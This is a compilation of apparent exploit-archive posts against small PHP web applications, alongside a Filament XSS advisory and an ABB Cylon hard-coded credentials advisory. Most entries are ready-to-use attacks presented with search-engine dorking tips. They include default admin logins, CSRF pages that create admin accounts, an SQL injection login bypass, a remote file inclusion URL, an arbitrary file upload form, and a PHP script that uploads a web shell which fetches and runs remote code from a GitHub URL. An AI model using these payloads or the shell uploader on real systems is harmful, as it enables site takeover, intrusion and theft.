Simple Student Quarterly Result / Grade System version 1.0 suffers from an ignored default credential vulnerability.

    =============================================================================================================================================| # Title     : Simple Student Quarterly Result / Grade System v1.0 Insecure Settings Vulnerability                                         || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/15169/simple-student-quarterly-resultgrade-system-php-and-mysql-free-source-code.html    |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Simple Student Quarterly Result / Grade System 1.0 Insecure Settings

Simple Responsive Tourism Website version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Simple Responsive Tourism Website v1.0 CSRF Vulnerability                                                                   |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/tourism_1.zip                                         |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following JavaScript code :

   creating a POST request using JavaScript to send certain data to a local server via HTTP. Here are the key points:

[+] Create an XMLHttpRequest object:

    xhr = new XMLHttpRequest(); Creates an XMLHttpRequest object that is used to send requests to the server.

[+] Open the request:

    xhr.open("POST", "http://127.0.0.1/tourism/classes/Users.php?f=save", true); Opens a connection to the specified URL (in this case, a local server) using the HTTP method "POST".

[+] Set the request headers:

    xhr.setRequestHeader("Accept", "*/*"); Specifies that the request accepts any type of response.  
    xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); Specifies that the request accepts responses in English.  
    xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------"); Specifies the content type of the request as multipart/form-data with specified boundaries.

[+] Enable sending cookies:

    xhr.withCredentials = true; Specifies that cookies should be sent with the request.

[+] Setting up the request data:

    The body is set up using a string containing the form data parts. Each part contains information such as username, password, and type.

    This string is converted to a Uint8Array and then to a Blob to be sent.

[+] Sending the request:

    xhr.send(new Blob([aBody])); Sends the data to the server.

[+] User Interface:  
    There is a button inside the HTML form that calls the submitRequest() function when clicked, which executes the request.

[+] Go to the line 6. Set the target site link Save changes and apply . 

[+] infected file : Users.php.

[+] Line 15 : Choose a name "indoushka".

[+] Line 19 : Choose a pass "Hacked".

[+] save code as poc.html 

[+] payload : 

<!DOCTYPE html>   
<html>   
<body>  
 <script> function submitRequest()   
 { var xhr = new XMLHttpRequest();   
 xhr.open("POST", "http:\/\/127.0.0.1\/php-ycrs\/tourism\/Users.php?f=save", true);   
 xhr.setRequestHeader("Accept", "*\/*");   
 xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");  
 xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------");  
 xhr.withCredentials = true;   
 var body =  
 "-----------------------------\r\n" +   
 "Content-Disposition: form-data; name=\"username\"\r\n" +   
 "\r\n" +   
 "indoushka\r\n" +   
 "-----------------------------\r\n" +   
 "Content-Disposition: form-data; name=\"password\"\r\n" +   
 "\r\n" +   
 "Hacked\r\n" +   
 "-----------------------------\r\n" +   
 "Content-Disposition: form-data; name=\"type\"\r\n" +   
 "\r\n" +   
 "1\r\n" +   
 "-------------------------------\r\n";   
 var aBody = new Uint8Array(body.length);   
 for (var i = 0; i < aBody.length; i++)   
 aBody[i] = body.charCodeAt(i);   
 xhr.send(new Blob([aBody]));   
 }  
 </script>  
 <form action="#">  
 <input type="button" value="Submit request" onclick="submitRequest();" />  
 </form>   
 </body>   
 </html>

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

Simple Responsive Tourism Website 1.0 Cross Site Request Forgery

Simple Music Management System version 1.0 suffers from add administrator and cross site request forgery vulnerabilities.

=============================================================================================================================================  
| # Title     : Simple Music Management System v1.0 CSRF Add ADmin Vulnerability                                                            |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            |  
| # Vendor    : https://www.kashipara.com/project/php/12978/music-management-system-in-php-php-project-source-code                          |  
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code add new admin .

[+] Go to the line 35.

[+] Set the target site link Save changes and apply . 

[+] save code as poc.html .

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>User Registration</title>  
</head>  
<body>

    <h2>User Registration</h2>  
    <form id="userForm" enctype="multipart/form-data">  
        <label for="email">User Name:</label>  
        <input type="email" id="email" name="email" required><br><br>

        <label for="password">Password:</label>  
        <input type="password" id="password" name="password" required><br><br>

        <div class="form-group">  
      <label for="" class="control-label">Avatar</label>  
      <div class="custom-file">  
              <input type="file" class="custom-file-input rounded-circle" id="customFile" name="img" onchange="displayImg(this,$(this))">  
              <label class="custom-file-label" for="customFile">Choose file</label>  
            </div>  
    </div>

        <input type="button" value="Save User" onclick="saveUser()">  
    </form>

    <script>  
        function saveUser() {  
            var form = document.getElementById('userForm');  
            var formData = new FormData(form);

            var xhr = new XMLHttpRequest();  
            xhr.open("POST", "http://127.0.0.1/music/ajax.php?action=save_user", true);

            xhr.onload = function () {  
                if (xhr.status === 200) {  
                    alert('User saved successfully');  
                } else {  
                    alert('An error occurred while saving the user');  
                }  
            };

            xhr.send(formData);  
        }  
    </script>

</body>  
</html>

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

Simple Music Management System 1.0 Add Administrator / Cross Site Request Forgery

Sample Blog Site version 1.0 suffers from cross site scripting and remote file inclusion vulnerabilities.

**Sample Blog Site 1.0 Cross Site Scripting / Remote File Inclusion**

**Sample Blog Site 1.0 Cross Site Scripting / Remote File Inclusion**

Posted Sep 30, 2024

Authored by indoushka

Sample Blog Site version 1.0 suffers from cross site scripting and remote file inclusion vulnerabilities.

tags | exploit, remote, vulnerability, xss, file inclusion

SHA-256 | 9eb4f98f6b5aa7c6a2b152f6a928201fce3e01efc03aed42ffeb58be9416ad69

Download | Favorite | View

**Sample Blog Site 1.0 Cross Site Scripting / Remote File Inclusion**

    =============================================================================================================================================| # Title     : Sample Blog Site 1.0 XSS Vulnerability                                                                                      || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-simple-ims.zip                                    |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /blog/index.php?id=2&page=http://testasp.vulnweb.com/t/xss.html%3f%2500.jpg[+] http://127.0.0.1/blog/index.php?id=2&page=http://testasp.vulnweb.com/t/xss.html%3f%2500.jpgGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Sample Blog Site 1.0 Cross Site Scripting / Remote File Inclusion

### Summary

If values passed to a `ColorColumn` or `ColumnEntry` are not valid and contain a specific set of characters, applications are vulnerable to Cross-site Scripting (XSS) attack against a user who opens a page on which a color column or entry is rendered.

Versions of Filament from v3.0.0 through v3.2.114 are affected.

Please upgrade to Filament [v3.2.115](https://github.com/filamentphp/filament/releases/tag/v3.2.115).

### PoC

> *PoC will be published in a few weeks, once developers have had a chance to upgrade their apps.*

### Response

This vulnerability (in `ColorColumn` only) was reported by @sv-LayZ, who reported the issue and patched the issue during the evening of 25/09/2024. Thank you Mattis.

The review process concluded on 27/09/2024, which revealed the issue was also present in `ColorEntry`. This was fixed the same day and Filament [v3.2.115](https://github.com/filamentphp/filament/releases/tag/v3.2.115) followed.

> *An explanation of the fix will be published in a few weeks, once developers have had a chance to upgrade their apps.*

Although these components are no longer vulnerable to this type of XSS attack, it is good practice to validate colors, and since many Filament users may be accepting color input using the `ColorPicker` form component, [additional color validation documentation was published](https://filamentphp.com/docs/3.x/forms/fields/color-picker#color-picker-validation).

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-47186

**Filament has unvalidated ColorColumn and ColorEntry values that can be used for Cross-site Scripting**

Critical severity GitHub Reviewed Published Sep 27, 2024 in filamentphp/filament • Updated Sep 27, 2024

**Package**

composer filament/infolists (Composer)

**Affected versions**

\>= 3.0.0, < 3.2.115

**Summary**

If values passed to a ColorColumn or ColumnEntry are not valid and contain a specific set of characters, applications are vulnerable to Cross-site Scripting (XSS) attack against a user who opens a page on which a color column or entry is rendered.

Versions of Filament from v3.0.0 through v3.2.114 are affected.

Please upgrade to Filament v3.2.115.

**PoC**

> _PoC will be published in a few weeks, once developers have had a chance to upgrade their apps._

**Response**

This vulnerability (in ColorColumn only) was reported by @sv-LayZ, who reported the issue and patched the issue during the evening of 25/09/2024. Thank you Mattis.

The review process concluded on 27/09/2024, which revealed the issue was also present in ColorEntry. This was fixed the same day and Filament v3.2.115 followed.

> _An explanation of the fix will be published in a few weeks, once developers have had a chance to upgrade their apps._

Although these components are no longer vulnerable to this type of XSS attack, it is good practice to validate colors, and since many Filament users may be accepting color input using the ColorPicker form component, additional color validation documentation was published.

**References**

*   GHSA-9h9q-qhxg-89xr
*   filamentphp/filament@df79893
*   https://github.com/filamentphp/filament/releases/tag/v3.2.115

Published to the GitHub Advisory Database

Sep 27, 2024

Last updated

Sep 27, 2024

GHSA-9h9q-qhxg-89xr: Filament has unvalidated ColorColumn and ColorEntry values that can be used for Cross-site Scripting

Simple Online Banking System version 1.0 suffers from an ignored default credential vulnerability.

    =============================================================================================================================================| # Title     : Simple Online Banking System v1.0 Insecure Settings Vulnerability                                                           || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/14868/banking-system-using-php-free-source-code.html                                     |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user = admin & pass = admin123[+] https://www/127.0.0.1/demo/site/loginGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Simple Online Banking System 1.0 Insecure Settings

ABB Cylon Aspect version 3.07.01 BMS/BAS controller is operating with default and hard-coded credentials contained in install package while exposed to the Internet.

    ABB Cylon Aspect 3.07.01 (config.inc.php) Hard-coded Credentials in phpMyAdminVendor: ABB Ltd.Product web page: https://www.global.abbAffected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio                  Firmware: <=3.07.01Summary: ASPECT is an award-winning scalable building energy managementand control solution designed to allow users seamless access to theirbuilding data through standard building protocols including smart devices.Desc: The ABB BMS/BAS controller is operating with default and hard-codedcredentials contained in install package while exposed to the Internet.Tested on: GNU/Linux 3.15.10 (armv7l)           GNU/Linux 3.10.0 (x86_64)           GNU/Linux 2.6.32 (x86_64)           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz           PHP/7.3.11           PHP/5.6.30           PHP/5.4.16           PHP/4.4.8           PHP/5.3.3           AspectFT Automation Application Server           lighttpd/1.4.32           lighttpd/1.4.18           Apache/2.2.15 (CentOS)           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)           phpMyAdmin 2.11.9Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceReported by DIVDAdvisory ID: ZSL-2024-5830Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5830.phpCVE ID: CVE-2024-4007CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-400721.04.2024--$ cat project                 P   R   O   J   E   C   T                        .|                        | |                        |'|            ._____                ___    |  |            |.   |' .---"|        _    .-'   '-. |  |     .--'|  ||   | _|    |     .-'|  _.|  |    ||   '-__  |   |  |    ||      |     |' | |.    |    ||       | |   |  |    ||      | ____|  '-'     '    ""       '-'   '-.'    '`      |____░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                                     ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░          ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░          ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                                                                                                                                              $ cat max/var/www/html/phpMyAdmin/config.inc.php | grep control$cfg['Servers'][$i]['controluser'] = 'root';$cfg['Servers'][$i]['controlpass'] = 'F@c1liTy';

ABB Cylon Aspect 3.07.01 Hard-Coded Credentials

School Log Management System version 1.0 suffers from a PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : School Log Management System 1.0 code injection Vulnerability                                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/school-log-management-system_1.zip                    |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This payload injects php code of your choice into an SHELL.php file. [+] Line 28    Line 37  [+] change the path of the script folder.[+] save payload as poc.php[+] usage from cmd : C:\www\test>php 1.php 127.0.0.1[+] payload :<?phpfunction file_upload($target_ip) {    $file_name = "indoushka.php";    $webshell_payload = "<?php        \$url = 'https://raw.githubusercontent.com/indoushka/txt/main/indoushka.txt';        \$ch = curl_init();        curl_setopt(\$ch, CURLOPT_URL, \$url);        curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true);        \$output = curl_exec(\$ch);        curl_close(\$ch);        if (\$output) {            include 'data://text/plain;base64,' . base64_encode(\$output);        }    ?>";    $post_fields = array(                'name' => 'Hacked By Indoushka',        'email' => 'indoushka4ever@gmail.com',    'contact' => '00213771818860',    'img' => new CURLFile('data://text/plain;base64,' . base64_encode($webshell_payload), 'application/x-php', $file_name),        'qty' => '1'    );    $ch = curl_init();    curl_setopt($ch, CURLOPT_URL, "http://$target_ip/slms/admin/ajax.php?action=save_settings");    curl_setopt($ch, CURLOPT_POST, 1);    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);    $response = curl_exec($ch);    curl_close($ch);    echo "(+) Shell uploaded successfully.\n";    echo "(+) Access the shell at: http://$target_ip/slms/admin/assets/uploads/\n";}if ($argc != 2) {    echo "(+) Usage: php " . $argv[0] . " <target ip>\n";    echo "(+) Example: php " . $argv[0] . " 10.0.0.1\n";    exit(-1);}$target_ip = $argv[1];file_upload($target_ip);Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

School Log Management System 1.0 Code Injection

Sample Blog Site version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

**Sample Blog Site 1.0 SQL Injection**

**Sample Blog Site 1.0 SQL Injection**

Posted Sep 26, 2024

Authored by indoushka

Sample Blog Site version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

tags | exploit, remote, sql injection, bypass

SHA-256 | ff00fa017d6b2c496a8bf995f9b728c45edba03e76532f4e55d8dac49f2ca066

Download | Favorite | View

**Sample Blog Site 1.0 SQL Injection**

    =============================================================================================================================================| # Title     : Sample Blog Site 1.0 auth by pass Vulnerability                                                                             || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-simple-ims.zip                                    |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : ' or 0=0 ##[+] http://127.0.0.1/blog/admin/index.php?page=homeGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Sample Blog Site 1.0 SQL Injection

Rupee Invoice System version 1.0 suffers from an arbitrary file upload vulnerability.

=============================================================================================================================================  
| # Title     : Rupee Invoice System v1.0 Remote File Upload Vulnerability                                                                  |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.mayurik.com/                                                                                                    |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code uploads a executable malicious file remotely .

[+] Go to the line 7.

[+] Set the target site link Save changes and apply . 

[+] infected file : phpinventory/php_action/createProduct.php.

[+] save code as poc.html .

<!DOCTYPE html>  
<html>  
<head>  
    <title>Create Product</title>  
</head>  
<body>  
    <form action="http://127.0.0.1/phpinventory/php_action/createProduct.php" method="POST" enctype="multipart/form-data">  
        <input type="hidden" name="currnt_date" value="100">

                <label for="productImage">Product Image:</label>  
        <input type="file" name="productImage" id="productImage" required><br><br>

        <input type="submit" name="create" value="Create">  
    </form>  
</body>  
</html>

[+] http://127.0.0.1/phpinventory/assets/myimages/dab.php

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

Tag

#php